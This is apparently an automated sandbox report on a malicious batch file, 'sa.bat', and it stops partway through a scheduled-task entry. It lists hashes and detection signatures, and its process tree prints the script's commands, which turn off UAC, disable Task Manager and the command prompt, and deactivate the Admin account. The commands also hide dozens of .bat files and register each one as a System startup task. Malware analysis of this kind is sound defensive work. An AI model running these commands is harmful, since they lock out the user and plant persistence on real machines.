Analysis

  • max time kernel
    90s
  • max time network
    203s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    01-10-2024 13:28

General

  • Target

    sa.bat

  • Size

    4KB

  • MD5

    fa632469970851bea61bc599f60804ab

  • SHA1

    8c25b218fe42577c7f7da82a90f1c302aadb934e

  • SHA256

    fc54b3fa585ed5f0ba2e4bcb35fef5efab3047fda88faf4f929edf6906e96e8a

  • SHA512

    df7a1ff63ad4116f11728d7eb2cc11c7e4bba5bcc2f250885d491efa370be3eef2e320665bfae17856549640556d94b49d6bd063155966059c53854391e7c6af

  • SSDEEP

    96:tT2T93BJmEAyKe6tfRywHBA4FOzm6z1f+7Sc6Hks8:vrRtfphWmcOSG

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 2 IoCs
  • Disables Task Manager via registry modification
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sa.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
      2⤵
      • UAC bypass
      PID:2088
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d 0 /f
      2⤵
      • UAC bypass
      PID:956
    • C:\Windows\system32\net.exe
      net user Admin LockedOut1234@@23122 /active:no
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3636
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user Admin LockedOut1234@@23122 /active:no
        3⤵
          PID:4972
      • C:\Windows\system32\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
        2⤵
          PID:1992
        • C:\Windows\system32\reg.exe
          reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 1 /f
          2⤵
            PID:556
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process call create "C:\Users\Admin\AppData\Local\Temp\sa.bat"
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2864
          • C:\Windows\system32\attrib.exe
            attrib +h +s C:\hidden1.bat
            2⤵
            • Views/modifies file attributes
            PID:2804
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn "HiddenTask1" /tr "C:\hidden1.bat" /sc onstart /ru System
            2⤵
              PID:1084
            • C:\Windows\system32\attrib.exe
              attrib +h +s C:\hidden2.bat
              2⤵
                PID:1804
              • C:\Windows\system32\schtasks.exe
                schtasks /create /tn "HiddenTask2" /tr "C:\hidden2.bat" /sc onstart /ru System
                2⤵
                • Scheduled Task/Job: Scheduled Task
                PID:3532
              • C:\Windows\system32\attrib.exe
                attrib +h +s C:\hidden3.bat
                2⤵
                  PID:3288
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /tn "HiddenTask3" /tr "C:\hidden3.bat" /sc onstart /ru System
                  2⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:944
                • C:\Windows\system32\attrib.exe
                  attrib +h +s C:\hidden4.bat
                  2⤵
                  • Views/modifies file attributes
                  PID:720
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /tn "HiddenTask4" /tr "C:\hidden4.bat" /sc onstart /ru System
                  2⤵
                    PID:4936
                  • C:\Windows\system32\attrib.exe
                    attrib +h +s C:\hidden5.bat
                    2⤵
                      PID:2092
                    • C:\Windows\system32\schtasks.exe
                      schtasks /create /tn "HiddenTask5" /tr "C:\hidden5.bat" /sc onstart /ru System
                      2⤵
                        PID:2644
                      • C:\Windows\system32\attrib.exe
                        attrib +h +s C:\hidden6.bat
                        2⤵
                        • Views/modifies file attributes
                        PID:2040
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /tn "HiddenTask6" /tr "C:\hidden6.bat" /sc onstart /ru System
                        2⤵
                          PID:240
                        • C:\Windows\system32\attrib.exe
                          attrib +h +s C:\hidden7.bat
                          2⤵
                          • Views/modifies file attributes
                          PID:2236
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /tn "HiddenTask7" /tr "C:\hidden7.bat" /sc onstart /ru System
                          2⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:4516
                        • C:\Windows\system32\attrib.exe
                          attrib +h +s C:\hidden8.bat
                          2⤵
                          • Views/modifies file attributes
                          PID:248
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /tn "HiddenTask8" /tr "C:\hidden8.bat" /sc onstart /ru System
                          2⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:3108
                        • C:\Windows\system32\attrib.exe
                          attrib +h +s C:\hidden9.bat
                          2⤵
                          • Views/modifies file attributes
                          PID:328
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /tn "HiddenTask9" /tr "C:\hidden9.bat" /sc onstart /ru System
                          2⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:4584
                        • C:\Windows\system32\attrib.exe
                          attrib +h +s C:\hidden10.bat
                          2⤵
                          • Views/modifies file attributes
                          PID:4720
                        • C:\Windows\system32\schtasks.exe
                          schtasks /create /tn "HiddenTask10" /tr "C:\hidden10.bat" /sc onstart /ru System
                          2⤵
                            PID:2060
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s C:\hidden11.bat
                            2⤵
                            • Views/modifies file attributes
                            PID:1520
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /tn "HiddenTask11" /tr "C:\hidden11.bat" /sc onstart /ru System
                            2⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:232
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s C:\hidden12.bat
                            2⤵
                            • Views/modifies file attributes
                            PID:3052
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /tn "HiddenTask12" /tr "C:\hidden12.bat" /sc onstart /ru System
                            2⤵
                              PID:1544
                            • C:\Windows\system32\attrib.exe
                              attrib +h +s C:\hidden13.bat
                              2⤵
                                PID:2276
                              • C:\Windows\system32\schtasks.exe
                                schtasks /create /tn "HiddenTask13" /tr "C:\hidden13.bat" /sc onstart /ru System
                                2⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:400
                              • C:\Windows\system32\attrib.exe
                                attrib +h +s C:\hidden14.bat
                                2⤵
                                • Views/modifies file attributes
                                PID:3420
                              • C:\Windows\system32\schtasks.exe
                                schtasks /create /tn "HiddenTask14" /tr "C:\hidden14.bat" /sc onstart /ru System
                                2⤵
                                  PID:3700
                                • C:\Windows\system32\attrib.exe
                                  attrib +h +s C:\hidden15.bat
                                  2⤵
                                  • Views/modifies file attributes
                                  PID:2268
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /tn "HiddenTask15" /tr "C:\hidden15.bat" /sc onstart /ru System
                                  2⤵
                                    PID:880
                                  • C:\Windows\system32\attrib.exe
                                    attrib +h +s C:\hidden16.bat
                                    2⤵
                                      PID:1540
                                    • C:\Windows\system32\schtasks.exe
                                      schtasks /create /tn "HiddenTask16" /tr "C:\hidden16.bat" /sc onstart /ru System
                                      2⤵
                                        PID:4416
                                      • C:\Windows\system32\attrib.exe
                                        attrib +h +s C:\hidden17.bat
                                        2⤵
                                          PID:4428
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks /create /tn "HiddenTask17" /tr "C:\hidden17.bat" /sc onstart /ru System
                                          2⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:4028
                                        • C:\Windows\system32\attrib.exe
                                          attrib +h +s C:\hidden18.bat
                                          2⤵
                                            PID:2928
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /create /tn "HiddenTask18" /tr "C:\hidden18.bat" /sc onstart /ru System
                                            2⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2736
                                          • C:\Windows\system32\attrib.exe
                                            attrib +h +s C:\hidden19.bat
                                            2⤵
                                              PID:5084
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /create /tn "HiddenTask19" /tr "C:\hidden19.bat" /sc onstart /ru System
                                              2⤵
                                                PID:3136
                                              • C:\Windows\system32\attrib.exe
                                                attrib +h +s C:\hidden20.bat
                                                2⤵
                                                • Views/modifies file attributes
                                                PID:1144
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /create /tn "HiddenTask20" /tr "C:\hidden20.bat" /sc onstart /ru System
                                                2⤵
                                                • Scheduled Task/Job: Scheduled Task
                                                PID:428
                                              • C:\Windows\system32\attrib.exe
                                                attrib +h +s C:\hidden21.bat
                                                2⤵
                                                  PID:3316
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /create /tn "HiddenTask21" /tr "C:\hidden21.bat" /sc onstart /ru System
                                                  2⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:1128
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +h +s C:\hidden22.bat
                                                  2⤵
                                                    PID:2948
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /create /tn "HiddenTask22" /tr "C:\hidden22.bat" /sc onstart /ru System
                                                    2⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4888
                                                  • C:\Windows\system32\attrib.exe
                                                    attrib +h +s C:\hidden23.bat
                                                    2⤵
                                                    • Views/modifies file attributes
                                                    PID:2348
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /create /tn "HiddenTask23" /tr "C:\hidden23.bat" /sc onstart /ru System
                                                    2⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4812
                                                  • C:\Windows\system32\attrib.exe
                                                    attrib +h +s C:\hidden24.bat
                                                    2⤵
                                                      PID:2888
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /create /tn "HiddenTask24" /tr "C:\hidden24.bat" /sc onstart /ru System
                                                      2⤵
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:4700
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +h +s C:\hidden25.bat
                                                      2⤵
                                                        PID:912
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /create /tn "HiddenTask25" /tr "C:\hidden25.bat" /sc onstart /ru System
                                                        2⤵
                                                          PID:1176
                                                        • C:\Windows\system32\attrib.exe
                                                          attrib +h +s C:\hidden26.bat
                                                          2⤵
                                                          • Views/modifies file attributes
                                                          PID:1048
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /create /tn "HiddenTask26" /tr "C:\hidden26.bat" /sc onstart /ru System
                                                          2⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:760
                                                        • C:\Windows\system32\attrib.exe
                                                          attrib +h +s C:\hidden27.bat
                                                          2⤵
                                                            PID:3816
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /create /tn "HiddenTask27" /tr "C:\hidden27.bat" /sc onstart /ru System
                                                            2⤵
                                                              PID:3588
                                                            • C:\Windows\system32\attrib.exe
                                                              attrib +h +s C:\hidden28.bat
                                                              2⤵
                                                              • Views/modifies file attributes
                                                              PID:4900
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /create /tn "HiddenTask28" /tr "C:\hidden28.bat" /sc onstart /ru System
                                                              2⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:3276
                                                            • C:\Windows\system32\attrib.exe
                                                              attrib +h +s C:\hidden29.bat
                                                              2⤵
                                                                PID:1452
                                                              • C:\Windows\system32\schtasks.exe
                                                                schtasks /create /tn "HiddenTask29" /tr "C:\hidden29.bat" /sc onstart /ru System
                                                                2⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:2084
                                                              • C:\Windows\system32\attrib.exe
                                                                attrib +h +s C:\hidden30.bat
                                                                2⤵
                                                                  PID:4908
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /create /tn "HiddenTask30" /tr "C:\hidden30.bat" /sc onstart /ru System
                                                                  2⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:2932
                                                                • C:\Windows\system32\attrib.exe
                                                                  attrib +h +s C:\hidden31.bat
                                                                  2⤵
                                                                  • Views/modifies file attributes
                                                                  PID:1952
                                                                • C:\Windows\system32\schtasks.exe
                                                                  schtasks /create /tn "HiddenTask31" /tr "C:\hidden31.bat" /sc onstart /ru System
                                                                  2⤵
                                                                    PID:2004
                                                                  • C:\Windows\system32\attrib.exe
                                                                    attrib +h +s C:\hidden32.bat
                                                                    2⤵
                                                                    • Views/modifies file attributes
                                                                    PID:1500
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /create /tn "HiddenTask32" /tr "C:\hidden32.bat" /sc onstart /ru System
                                                                    2⤵
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:1184
                                                                  • C:\Windows\system32\attrib.exe
                                                                    attrib +h +s C:\hidden33.bat
                                                                    2⤵
                                                                    • Views/modifies file attributes
                                                                    PID:2584
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /create /tn "HiddenTask33" /tr "C:\hidden33.bat" /sc onstart /ru System
                                                                    2⤵
                                                                      PID:4968
                                                                    • C:\Windows\system32\attrib.exe
                                                                      attrib +h +s C:\hidden34.bat
                                                                      2⤵
                                                                      • Views/modifies file attributes
                                                                      PID:2728
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      schtasks /create /tn "HiddenTask34" /tr "C:\hidden34.bat" /sc onstart /ru System
                                                                      2⤵
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:4904
                                                                    • C:\Windows\system32\attrib.exe
                                                                      attrib +h +s C:\hidden35.bat
                                                                      2⤵
                                                                      • Views/modifies file attributes
                                                                      PID:4912
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      schtasks /create /tn "HiddenTask35" /tr "C:\hidden35.bat" /sc onstart /ru System
                                                                      2⤵
                                                                      • Scheduled Task/Job: Scheduled Task
                                                                      PID:4092
                                                                    • C:\Windows\system32\attrib.exe
                                                                      attrib +h +s C:\hidden36.bat
                                                                      2⤵
                                                                        PID:2936
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks /create /tn "HiddenTask36" /tr "C:\hidden36.bat" /sc onstart /ru System
                                                                        2⤵
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:4664
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib +h +s C:\hidden37.bat
                                                                        2⤵
                                                                          PID:3720
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks /create /tn "HiddenTask37" /tr "C:\hidden37.bat" /sc onstart /ru System
                                                                          2⤵
                                                                            PID:3032
                                                                          • C:\Windows\system32\attrib.exe
                                                                            attrib +h +s C:\hidden38.bat
                                                                            2⤵
                                                                            • Views/modifies file attributes
                                                                            PID:1848
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /create /tn "HiddenTask38" /tr "C:\hidden38.bat" /sc onstart /ru System
                                                                            2⤵
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:3636
                                                                          • C:\Windows\system32\attrib.exe
                                                                            attrib +h +s C:\hidden39.bat
                                                                            2⤵
                                                                            • Views/modifies file attributes
                                                                            PID:3976
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /create /tn "HiddenTask39" /tr "C:\hidden39.bat" /sc onstart /ru System
                                                                            2⤵
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:2116
                                                                          • C:\Windows\system32\attrib.exe
                                                                            attrib +h +s C:\hidden40.bat
                                                                            2⤵
                                                                            • Views/modifies file attributes
                                                                            PID:2864
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /create /tn "HiddenTask40" /tr "C:\hidden40.bat" /sc onstart /ru System
                                                                            2⤵
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:3808
                                                                          • C:\Windows\system32\attrib.exe
                                                                            attrib +h +s C:\hidden41.bat
                                                                            2⤵
                                                                              PID:1084
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              schtasks /create /tn "HiddenTask41" /tr "C:\hidden41.bat" /sc onstart /ru System
                                                                              2⤵
                                                                              • Scheduled Task/Job: Scheduled Task
                                                                              PID:2868
                                                                            • C:\Windows\system32\attrib.exe
                                                                              attrib +h +s C:\hidden42.bat
                                                                              2⤵
                                                                                PID:3532
                                                                              • C:\Windows\system32\schtasks.exe
                                                                                schtasks /create /tn "HiddenTask42" /tr "C:\hidden42.bat" /sc onstart /ru System
                                                                                2⤵
                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                PID:3924
                                                                              • C:\Windows\system32\attrib.exe
                                                                                attrib +h +s C:\hidden43.bat
                                                                                2⤵
                                                                                  PID:3884
                                                                                • C:\Windows\system32\schtasks.exe
                                                                                  schtasks /create /tn "HiddenTask43" /tr "C:\hidden43.bat" /sc onstart /ru System
                                                                                  2⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:3988
                                                                                • C:\Windows\system32\attrib.exe
                                                                                  attrib +h +s C:\hidden44.bat
                                                                                  2⤵
                                                                                    PID:3644
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    schtasks /create /tn "HiddenTask44" /tr "C:\hidden44.bat" /sc onstart /ru System
                                                                                    2⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:2232
                                                                                  • C:\Windows\system32\attrib.exe
                                                                                    attrib +h +s C:\hidden45.bat
                                                                                    2⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:3232
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    schtasks /create /tn "HiddenTask45" /tr "C:\hidden45.bat" /sc onstart /ru System
                                                                                    2⤵
                                                                                      PID:2508
                                                                                    • C:\Windows\system32\attrib.exe
                                                                                      attrib +h +s C:\hidden46.bat
                                                                                      2⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:4716
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks /create /tn "HiddenTask46" /tr "C:\hidden46.bat" /sc onstart /ru System
                                                                                      2⤵
                                                                                        PID:4456
                                                                                      • C:\Windows\system32\attrib.exe
                                                                                        attrib +h +s C:\hidden47.bat
                                                                                        2⤵
                                                                                        • Views/modifies file attributes
                                                                                        PID:1212
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        schtasks /create /tn "HiddenTask47" /tr "C:\hidden47.bat" /sc onstart /ru System
                                                                                        2⤵
                                                                                          PID:3880
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +h +s C:\hidden48.bat
                                                                                          2⤵
                                                                                          • Views/modifies file attributes
                                                                                          PID:4696
                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                          schtasks /create /tn "HiddenTask48" /tr "C:\hidden48.bat" /sc onstart /ru System
                                                                                          2⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:1628
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +h +s C:\hidden49.bat
                                                                                          2⤵
                                                                                            PID:132
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks /create /tn "HiddenTask49" /tr "C:\hidden49.bat" /sc onstart /ru System
                                                                                            2⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1408
                                                                                          • C:\Windows\system32\attrib.exe
                                                                                            attrib +h +s C:\hidden50.bat
                                                                                            2⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:852
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks /create /tn "HiddenTask50" /tr "C:\hidden50.bat" /sc onstart /ru System
                                                                                            2⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:4216
                                                                                          • C:\Windows\system32\attrib.exe
                                                                                            attrib +h +s C:\hidden51.bat
                                                                                            2⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:3728
                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                            schtasks /create /tn "HiddenTask51" /tr "C:\hidden51.bat" /sc onstart /ru System
                                                                                            2⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:1596
                                                                                          • C:\Windows\system32\attrib.exe
                                                                                            attrib +h +s C:\hidden52.bat
                                                                                            2⤵
                                                                                              PID:4188
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks /create /tn "HiddenTask52" /tr "C:\hidden52.bat" /sc onstart /ru System
                                                                                              2⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:3788
                                                                                            • C:\Windows\system32\attrib.exe
                                                                                              attrib +h +s C:\hidden53.bat
                                                                                              2⤵
                                                                                              • Views/modifies file attributes
                                                                                              PID:1172
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              schtasks /create /tn "HiddenTask53" /tr "C:\hidden53.bat" /sc onstart /ru System
                                                                                              2⤵
                                                                                                PID:1112
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib +h +s C:\hidden54.bat
                                                                                                2⤵
                                                                                                • Views/modifies file attributes
                                                                                                PID:2952
                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                schtasks /create /tn "HiddenTask54" /tr "C:\hidden54.bat" /sc onstart /ru System
                                                                                                2⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:456
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib +h +s C:\hidden55.bat
                                                                                                2⤵
                                                                                                • Views/modifies file attributes
                                                                                                PID:2068
                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                schtasks /create /tn "HiddenTask55" /tr "C:\hidden55.bat" /sc onstart /ru System
                                                                                                2⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:4300
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                attrib +h +s C:\hidden56.bat
                                                                                                2⤵
                                                                                                  PID:3940
                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                  schtasks /create /tn "HiddenTask56" /tr "C:\hidden56.bat" /sc onstart /ru System
                                                                                                  2⤵
                                                                                                    PID:4432
                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                    attrib +h +s C:\hidden57.bat
                                                                                                    2⤵
                                                                                                      PID:1988
                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                      schtasks /create /tn "HiddenTask57" /tr "C:\hidden57.bat" /sc onstart /ru System
                                                                                                      2⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:1824
                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                      attrib +h +s C:\hidden58.bat
                                                                                                      2⤵
                                                                                                      • Views/modifies file attributes
                                                                                                      PID:4676
                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                      schtasks /create /tn "HiddenTask58" /tr "C:\hidden58.bat" /sc onstart /ru System
                                                                                                      2⤵
                                                                                                        PID:1496
                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                        attrib +h +s C:\hidden59.bat
                                                                                                        2⤵
                                                                                                        • Views/modifies file attributes
                                                                                                        PID:3724
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        schtasks /create /tn "HiddenTask59" /tr "C:\hidden59.bat" /sc onstart /ru System
                                                                                                        2⤵
                                                                                                          PID:4212
                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                          attrib +h +s C:\hidden60.bat
                                                                                                          2⤵
                                                                                                          • Views/modifies file attributes
                                                                                                          PID:3348
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks /create /tn "HiddenTask60" /tr "C:\hidden60.bat" /sc onstart /ru System
                                                                                                          2⤵
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:4596
                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                          attrib +h +s C:\hidden61.bat
                                                                                                          2⤵
                                                                                                          • Views/modifies file attributes
                                                                                                          PID:1928
                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                          schtasks /create /tn "HiddenTask61" /tr "C:\hidden61.bat" /sc onstart /ru System
                                                                                                          2⤵
                                                                                                            PID:480
                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                            attrib +h +s C:\hidden62.bat
                                                                                                            2⤵
                                                                                                            • Views/modifies file attributes
                                                                                                            PID:3104
                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                            schtasks /create /tn "HiddenTask62" /tr "C:\hidden62.bat" /sc onstart /ru System
                                                                                                            2⤵
                                                                                                              PID:4640
                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                              attrib +h +s C:\hidden63.bat
                                                                                                              2⤵
                                                                                                                PID:4872
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks /create /tn "HiddenTask63" /tr "C:\hidden63.bat" /sc onstart /ru System
                                                                                                                2⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:3364
                                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                                attrib +h +s C:\hidden64.bat
                                                                                                                2⤵
                                                                                                                  PID:4592
                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                  schtasks /create /tn "HiddenTask64" /tr "C:\hidden64.bat" /sc onstart /ru System
                                                                                                                  2⤵
                                                                                                                    PID:1792
                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                    attrib +h +s C:\hidden65.bat
                                                                                                                    2⤵
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:3944
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /create /tn "HiddenTask65" /tr "C:\hidden65.bat" /sc onstart /ru System
                                                                                                                    2⤵
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:3488
                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                    attrib +h +s C:\hidden66.bat
                                                                                                                    2⤵
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:2292
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /create /tn "HiddenTask66" /tr "C:\hidden66.bat" /sc onstart /ru System
                                                                                                                    2⤵
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:1536
                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                    attrib +h +s C:\hidden67.bat
                                                                                                                    2⤵
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:4424
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /create /tn "HiddenTask67" /tr "C:\hidden67.bat" /sc onstart /ru System
                                                                                                                    2⤵
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:3588
                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                    attrib +h +s C:\hidden68.bat
                                                                                                                    2⤵
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:5076
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /create /tn "HiddenTask68" /tr "C:\hidden68.bat" /sc onstart /ru System
                                                                                                                    2⤵
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:2840
                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                    attrib +h +s C:\hidden69.bat
                                                                                                                    2⤵
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:3448
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /create /tn "HiddenTask69" /tr "C:\hidden69.bat" /sc onstart /ru System
                                                                                                                    2⤵
                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                    PID:3892
                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                    attrib +h +s C:\hidden70.bat
                                                                                                                    2⤵
                                                                                                                    • Views/modifies file attributes
                                                                                                                    PID:3400
                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                    schtasks /create /tn "HiddenTask70" /tr "C:\hidden70.bat" /sc onstart /ru System
                                                                                                                    2⤵
                                                                                                                      PID:1472
                                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                                      attrib +h +s C:\hidden71.bat
                                                                                                                      2⤵
                                                                                                                        PID:776
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /create /tn "HiddenTask71" /tr "C:\hidden71.bat" /sc onstart /ru System
                                                                                                                        2⤵
                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                        PID:3120
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        attrib +h +s C:\hidden72.bat
                                                                                                                        2⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:4848
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /create /tn "HiddenTask72" /tr "C:\hidden72.bat" /sc onstart /ru System
                                                                                                                        2⤵
                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                        PID:1500
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        attrib +h +s C:\hidden73.bat
                                                                                                                        2⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:3796
                                                                                                                      • C:\Windows\system32\schtasks.exe
